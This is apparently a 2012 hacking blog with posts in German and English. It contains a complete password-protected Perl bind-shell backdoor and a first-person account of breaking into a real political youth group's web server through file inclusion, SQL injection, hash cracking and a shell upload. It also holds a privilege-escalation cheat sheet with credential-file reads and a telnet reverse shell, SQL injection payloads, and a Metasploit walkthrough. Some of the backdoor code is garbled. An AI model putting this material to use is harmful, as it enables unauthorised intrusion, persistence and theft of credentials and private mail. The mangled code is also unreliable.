learn online with video tutorials…

Posted in Uncategorized on April 24, 2012 by peak

IT hardware basics:

IT network basics:

IT security basics:

Windows basics:

Mathematics & Physics:

Learn Programming in c,obj-c,c++,c#,java

Perl Backdoor with pty

Posted in r00ting on April 17, 2012 by peak

# Advanced perl backdoor
use warnings;
use strict;
use IO::Socket;
use IO::Select;
use POSIX;

my $PORT = 18082;
# perl -e ‚$pass=“yourpassword“; print crypt($pass,substr($pass,2)).“n“‚
my $PASSWORD = ‚pawQj8NmTbBGI‘;
my $SHELL = „/bin/sh“;
my $HOME = „/tmp“;
my $PROC = „/bin/sh“;
my $PROMPT = „P-> „;
my @STTY = (’sane‘, ‚echoe‘, ‚echoctl‘, ‚echoke‘, ‚-ixany‘);

$ENV{PS1} = ‚\u@\h:\w\$ ‚;
$ENV{PATH} = ‚/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/ucb‘;
$ENV{HISTFILE} = ‚/dev/null‘;
$ENV{USER} = ‚root‘;
$ENV{LOGNAME} = ‚root‘;
$ENV{LS_OPTIONS} = ‚ –color=auto -F -b -T 0‘;
$ENV{LS_COLORS} = ‚LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:‘;
$ENV{TERM} = ‚xterm‘;

$0 = $PROC.““;

$SIG{CHLD} = sub { wait; };


safeload(’sys/ttycom.ph‘, 1);
safeload(’sys/ioctl.ph‘, 1);
safeload(‚asm/ioctls.ph‘, 1);

foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined());
# linux
if (open(IOD, „< /usr/include/asm/ioctls.h")) {
while() {
#if (/^#defines+$IOCTLs+(.*?)n$/) {
if (/^#define\s+$IOCTL\s+(.*?)\n$/) {
eval „sub $IOCTL () {$1;}“;
eval „sub $IOCTL () { $IOCTLDEF{$IOCTL};}“ unless (defined());

$PORT = $ARGV[0] if ($ARGV[0]);

my $bind = IO::Socket::INET->new(Listen=>1, LocalPort=>$PORT, Proto=>“tcp“) or die „$!“;

defined(my $pid = fork)
or die „$!“;
exit if $pid;

my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();

while (1) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);

sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));

sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));

sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
do_client($newcon, ‚3‘, ‚5‘, ‚1‘);
write_client($newcon, $PROMPT) if ($PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
} else {
telnet_parse($fh, $msg);

sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split(“, $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /r|n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = “;
$pass =~ s/n//g;
$pass =~ s/0//g;
$pass =~ s/r//g;
if (crypt($pass, $PASSWORD) ne $PASSWORD) {
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, „\r\n\r“);
$msg =~ s/rn00//g;
$msg =~ s/0//g;
$msg =~ s/rn/n/g;
write_shell($cli, $msg);

sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
unless (defined $nread) {
} else {
write_client($cli, $msg);

sub to_chr {
my $chrs = “;
map { $chrs .= chr($_) } (split(/ +/, shift));

sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;

sub chr_parse {
my ($client, $chrs) = @_;
my $ords = “;
map { $ords .= ord($_).‘ ‚ } (split(//, $chrs));
my $msg = “;

if ($ords =~ /255 250 31 (d+) (d+) (d+) (d+)/) {
my $winsize = pack(‚C4‘, $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# or die „$!“;

foreach my $code (split(„255 „, $ords)) {
if ($code =~ /(d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
write_client($client, $msg) if ($msg);

sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, „ERROR: No more pty’s avaliable\n“);
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, „ERROR: fork()\n“);
unless($pid) {
if (open (DEVTTY, „/dev/tty“)) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# or die „$!“;
ioctl($tty, &TIOCSCTTY, 0);# or die „$!“;

open (STDIN, „&“.fileno($tty)) or die „$!“;
open (STDERR, „>&“.fileno($tty)) or die „$!“;
foreach my $stty („/bin/stty“, „/usr/bin/stty“) {
next unless (-x $stty);
map { system(„$stty“, $_) } @STTY;

{ exec(„$SHELL“) };
while (my $msg = ) {
$msg =~ s/n$//;
$msg =~ s/r$//;
system(„$msg 2>&1“);
select($pty); $|++;
$CLIENT{$cli}->{shell} = $pty;

sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
return undef;
unless ($termios->getattr($ttyno)) {
return undef;
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
return undef;
return 1;

sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{„pty.$cli“}, *{„tty.$cli“});
for (my $i=0; $i $pty“));
my $tty = get_tty($i, „/dev/tty“);
unless(open($TTY, „+> $tty“)) {
return($TTY, $PTY);

sub get_tty {
my ($num, $base) = @_;
my @series = (‚p‘ .. ‚z‘, ‚a‘ .. ‚e‘);
my @subs = (‚0‘ .. ‚9‘, ‚a‘ .. ‚f‘);
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];

sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::///g;
if ($require) {
map { eval („require \“$_/$file\“;“) if(-f „$_/$file“); } @INC;
} else {
$file .= „.pm“ unless ($file =~ /(.pm|.ph)$/);
return(eval(„use $module $arg;“)) if (grep { -f „$_/$file“ } @INC);

sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless($shell);
foreach my $m (split_chars($msg, 20)) {
print $shell $m;

sub split_chars {
no warnings;
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split (“, $msg);
my $done = 0;
while (1) {
my $splited = join(“, @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) {sock};

if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sock->close() if($sock);

sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);

post exploitation pty shell

Posted in r00ting on März 5, 2012 by peak


python -c 'import pty; pty.spawn("/bin/bash");'


# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh

sh-3.2$ expect sh.exp

Hacking jusos aus dem Saarland

Posted in PHP Injection on Februar 15, 2012 by peak

Ich werde mich stichwortartig kurz halten wie ich vorgegangen bin.

1. Safe Mod Restriction erkannt
2. restriction bis zum /var/www/web53/html/ ordner
3. trotzdem log files getestet um sicher zu sein, sowie einige config files oder sessions -> fehlanzeige
4. php input wrapper probiert
5. php base64 filter erfolgreich auf die index.php
6. base64 code decoded, index source gelesen -> db_oeffnen.inc.php gefunden
7. db_oeffnen.inc.php wieder included und wieder base64 code decodiert
8. das hier gefunden:


9. nmap scan des Servers -> 3306/tcp open mysql
10. versucht mit mysql client auf den server zu verbinden -> fehlanzeige
11. selbiges über ssh versucht
12. sqli lücke auf der seite gesucht und nach 10s gefunden
13. über mysql lücke outfile machen wollen aber mysql quotes sind enabled also funktioniert das auch nicht
14. user registriert, konnte nicht aktiviert werden
15. sqli admin table etc auslesen
16. admin md5 hash mit bekannten online md5 cracker herausgefunden
16. admin login suchen und mich nicht austricken lassen /admin/ -> fail, /admin/login.php
17. admin bereich nach upload möglichkeiten gesucht
18. nach ein paar versuchen gemerkt das das panel so verbugt ist das es wieder sicher ist,
19. mein registrierter user aktiviert und im user panel nach upload möglichkeit gesucht, nix gefunden
20. source code über die lfi angeschaut und den Fehler gesucht
21. gemerkt das es am safe mode liegt
22. phpmyadmin gesucht
23. phpmyadmin.jusos-saar.de hosting panel gefunden
24. login aus der source genommen. -> funktioniert.
25. bissl rumschnuppern …
26. webFTP, shell hochgeladen
27. erkannt das 10 domanis auf dem server sind, sowie zugriff auf alle mails der örtiegn usos und ftp und und und und …
28. Januar 2012 Monthly Totals Visits:10158 Hits: 199200
29. passwort in diesem Beitrag zensiert
30. neue email adresse erstellt
31. über webMail den admin sowie das Büro informiert

Basic Linux Privilege Escalation

Posted in r00ting on Januar 31, 2012 by peak

following article is from g0tmi1k! I don’t take any credits. Visit his Blog: http://g0tmi1k

Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a „magic“ answer in this huge area. This is simply my findings, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just in a different light. I know there are more „things“ to look for. It’s just a basic & rough guide. Not every command will work for each system, as Linux varies so much. „It“ will not jump off the screen – you have to hunt for that „little thing“, as „the devil is in the detail“.

Enumeration is the key.
(Linux) privilege escalation is all about:

Collect – Enumeration, more enumeration and some more enumeration.
Process – Sort through data, analyse and prioritise.
Search – Know what to search for and where to find the exploit code.
Adapt – Customize the exploit, so it fits. Not every exploit works for every system „out of the box“.
Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
cat /etc/service

Which service(s) are being run by root? Of these services, which are vulnerable – it’s worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‚$1 ~ /^.*r.*/

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 „password“ [filename]
find . -name „*.php“ -print0 | xargs -0 grep -i -n „var $password“   # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig –list
chkconfig –list | grep 3:on

What’s cached? IP and/or MAC addresses
arp -e
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 80 and tcp dst 21

Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attacker's ip] 44444 | /bin/sh | [local ip] 44445    # On the target system. Use the attacker's IP!

Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080: root@    # Local Port
ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
cat /etc/passwd | cut -d:    # List of users
grep -v -E „^#“ /etc/passwd | awk -F: ‚$3 == 0 { print $1}‘   # List of super users
awk -F: ‚($3 == „0“) {print}‘ /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything „interesting“ in the home directory(ies)? If it’s possible to access them
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk ‚$1 ~ /^.*w.*/‘ 2>/dev/null     # Anyone
ls -aRl /etc/ | awk ‚$1 ~ /^..w/‘ 2>/dev/null        # Owner
ls -aRl /etc/ | awk ‚$1 ~ /^…..w/‘ 2>/dev/null    # Group
ls -aRl /etc/ | awk ‚$1 ~ /w.$/‘ 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with „Local File Includes“!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, can you break out of the „jail“ shell?
python -c ‚import pty;pty.spawn(„/bin/bash“)‘
echo os.system(‚/bin/bash‘)
/bin/sh -i

How are file-systems mounted?
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What „Advanced Linux File Permissions“ are used? Sticky bits, SUID & SGID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r „bin$“`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in ‚common‘ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can be written to and executed from? A few ‚common‘ places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any „problem“ files? World-writeable, „nobody“ files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # No-owner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code

Finding more information regarding the exploit

(Quick) „Common“ exploits. Warning. Pre-compiled binaries files. Use at your own risk

Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

Other (quick) guides & Links





rooting Samsung Galaxy Note (GT-N7000)

Posted in Android on Januar 23, 2012 by peak

1. Get Stock ROM from Samsung that is rootable & odin


the zergRush Exploit should work with every model <= KL3, so get that image; e.g. I’m working with KKA. Next, get Odin to flash stock ROMs (don’t flash a custom ROM, it will increase an inner counter)


2. Downgrade your Galaxy Note with Odin to that rootable stock ROM you just downloaded

Make sure USB Debugging is enabled. Include your ROM in „pda“. It’s simple ..

3. Download drivers and the zergRush Exploit


password: samfirmware.com


4. root your device

Make sure USB Debugging is enabled.

Connect your phone with your computer (it should get acknowledged!)

Make sure your USB Memory is connected (swipe down the menu and tap on the connect usb)

run the zerg exploit (simple, check the zip file. I’m using DooMLoRD_v4_ROOT-zergRush)

5. Install ClockworkMod Recovery manually (you need it to flash custom ROMs)

Download http://downloadandroidrom.com/file/GalaxyNote/recovery/GalaxyNoteRecovery.zip

now swap to your shell/cmd (i’m on win7 atm.)

cd \GalaxyNoteRecovery

adb devices

adb push KKA\zImage /data/local/zImage

adb shell

dd if=/data/local/zImage of=/dev/block/mmcblk0p5 bs=4096
rm /data/local/zImage

6. Congratz! You are root, now lets update to newest StockRom

You can do that with Mobile Odin Pro.apk or with the just installed CWM Recovery.

Download MobileOdin Pro and your up-to-date stock ROM (extract it) and copy both, the .apk and the .md5 file, into the root directory of your phone (disable USB debugging for this and use Windows Explorer). It is also possible that you have 3 files instead of .md5!
Now Keep the everroot option enabled. flash. done.

Copy your rom on root (.md5 files or more). Open CWM and „Flash Stock Firmware“ if you just got md5 always take that when asked. And when asked choose „Keep CF-Root Kernel“. Done.

Some Exotic MySQL Magic

Posted in SQL Injection on Januar 21, 2012 by peak

MySQL Columns/Tables herausfinden in v4.x mit error report on


MySQL answer:
“Operand should contain 7 column(s)”

‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)– –

MySQL answer:
“Column ‘usr_u_id’ cannot be null”

SELECT id, name, pass FROM users WHERE id = 1 PROCEDURE ANALYSE()

you have to see the first column output: testdb.users.id

MySQL Error based SQL Injection

select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

/?param=and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)–

/?param=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)–

Log Files Sorted by OS

Posted in PHP Injection on Januar 14, 2012 by peak

Jedes OS hat seine eigenen typischen LogFiles und Config Files. Natürlich könnten diese auch vom Admin angepasst werden. Im Laufe der Zeit werde ich weitere Paths hinzufügen.



/etc/issue.net <- Version



0wning Metasploitable

Posted in r00ting with tags , on Januar 13, 2012 by peak

Metasploit Framework Einführung – Owning Metasploitable

Das sind ein paar Notizen von mir. Dieses Tutorial sollte eine Einführung in das Metasploitframework werden.
Es gibt im Netz, und vor allem auf YouTube, dutzende Tutorials/Guides/HowTos. Ich werde euch nun meine Variante vorstellen.

Ich empfehle euch das ganze als Testumgebung in VmWare laufenzulassen.
Installiert dafür den kostenlosen VmWare Player

Als nächstes ladet euch noch eine BackTrack 4 VMware Image herunter. Darauf werden wir arbeiten.

Und Metasploitable. Das ist ein Ubuntu Server mit vielen eingerichteten Vulns um das msf zu testen.

Starten nun beide VmWares und wechselt zur BackTrack4 vm.

BT4 Login root:toor

Startet nun als Erstes das UI mit startx und passt das Keyboardlayout unter Settings/Regional & Accessibility/Keyboard Layout entsprechend an.

So wir starten nun das Netzwerkinterface, weil bt4 das nicht automatisch macht.
/etc/init.d/networking start
check mit ifconfig
Lasst uns nun zuerst bt4 updaten

apt-get update
apt-get upgrade
apt-get dist-upgrade

und updated msf

cd /pentest/exploits/framework3
svn update

ok, bt4 ready to rock.

Scanne LAN nach Hosts

root@bt:~# nmap -sP

Nmap scan report for
Host is up (0.00067s latency).
MAC Address: 00:0C:29:0B:88:85 (VMware)

Ihr erhaltet eine Liste aktiver Hosts. Nmap identifiziert die Mac automatisch als VmWare. In meinem Fall hat der Server die ip

Mit nmap werden wir testen welche Ports auf dem Server offen sind. Ausserdem wird nmap versuchen das OS (-O) und genauere Informationen zum Service hinter einem offenem Port (-sV) herauszufinden.

root@bt:~# nmap -sV -O

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-03-15 20:40 EDT
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 988 closed ports
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:0B:88:85 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.01 seconds

Wir wissen nun das wir es mit einem Linux Webserver zu tun haben.
Mit Apache Tomcat/MySQl kenne ich mich am besten aus darum werde ich mir den als erstes Anschauen.

Dafür gleich einmal einen kurzen Check. Mit nc mache ich eine schnelle GET-Abfrage. (Natürlich kann man genauso gut Firefox starten und [url][/url] als URL eingeben)
nc 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request

Offensichtlich liegt jedoch keine Website im wwwsrc-Folder. Um sich aber sicher zu sein, sollte man wenigstens mit einem Fuzzer darübergehen.

Das Tool dafür heisst DirBuster.

cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u

Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 200
Dir found: /doc/ - 403
Dir found: /twiki/ - 200
File found: /twiki/readme.txt - 200
File found: /twiki/license.txt - 200
File found: /twiki/TWikiDocumentation.html - 200
Dir found: /twiki/bin/ - 403

Bingo -> Wenn wir nun auf [url][/url] gehen, kommen wir schliesslich über getStarted auf [url][/url], und das ist offensichtlich ein CMS. Wir könnten jetzt auf exploit-db nach einer bereits bekannten Vuln suchen, aber hier soll es ja um das msf gehen, also starten wir nun msfconsole.

cd /pentest/exploit/framework3

Help ruft die Hilfe auf. Show Exploits zeigt uns alle Exploits an, und Search durchsucht das msf nach meinem String, z.B. tikiwiki.

msf > search tikiwiki

Wir sehen nun Auxiliary- und Exploit-Module. Auxiliary sind Sniffing-, Fuzzing- und Scanning-Module, die hauptsächlich Informationen liefern. Solche Module werden keine Shell starten. Exploits hingegen können aktiv sein und eine Shell spawnen (service-orientierter Exploit) oder passiv sein und auf eingehende Client-Connections warten (client-orientierter Exploit -> Web Browsers, FTP Client, etc.)

Ich verwende den PHP Code Executer:

use exploit/unix/webapp/tikiwiki_graph_formula_exec

Mit Info können wir nun genauere Informationen und eine Erklärung zum Exploit sehen.

Wir müssen nun als nächstes gewisse Parameter für den Exploit einstellen. Mit Show Options werden diese angezeigt.

Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        Use a proxy chain
RHOST                     yes       The target address
RPORT    80               yes       The target port
URI      /tikiwiki        yes       TikiWiki directory path
VHOST                     no        HTTP server virtual host

Alle Optionen die Required sind müssen gesetzt werden. Das machen wir folgendermassen:

sf exploit(tikiwiki_graph_formula_exec) > set RHOST

Nun haben wir den Exploit startbereit doch was soll er machen? Dafür ist der sogenannte payload zuständig. Mit show payloads können wir alle kompatible payloads sehen.
Ich will eine php shell spawnen, deshalb verwende ich die php bind_shell

set payload php/bind_php

Wir geben nun wieder show options ein und sehen nun das wir auch Parameter für den payload verwenden können. Ich ändere z.B. den Port nach meinen Wünschen.

set lport 55555

So, der Exploit ist nun bereit.

msf exploit(tikiwiki_graph_formula_exec) > check
[+] The target is vulnerable.
msf exploit(tikiwiki_graph_formula_exec) > exploit

[*] Started bind handler
[*] Attempting to obtain database credentials...
[*] The server returned            : 200 OK
[*] Server version                 : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :

db_tiki   : mysql
dbversion : 1.9
